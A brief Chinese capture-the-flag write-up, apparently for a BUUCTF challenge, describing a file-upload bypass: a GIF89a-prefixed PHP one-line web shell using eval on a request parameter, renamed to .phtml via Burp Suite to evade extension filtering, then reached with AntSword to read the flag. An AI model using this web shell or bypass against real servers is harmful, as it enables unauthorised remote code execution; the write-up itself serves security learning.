题目提示要上传图片,先上传普通的一句话木马试试,发现得到都是No image
上传常见的图片木马
GIF89a
<script language='php'>@eval($_REQUEST[a]);</script>
用bp抓包,把文件后缀名改为test.phtml
因为发现后缀.php,.php2,.php3,.php4,.php5,.php6,.php7都不能显示上传成功,所以可能都被过滤了,只有.phtml可以
使用蚁剑连接,猜测保存在upload下面,并加上test.phtml
url:http://e8b06031-6b57-42e0-9dc4-16dcd04f73bc.node4.buuoj.cn:81/upload/test.phtml
即可在根目录找到flag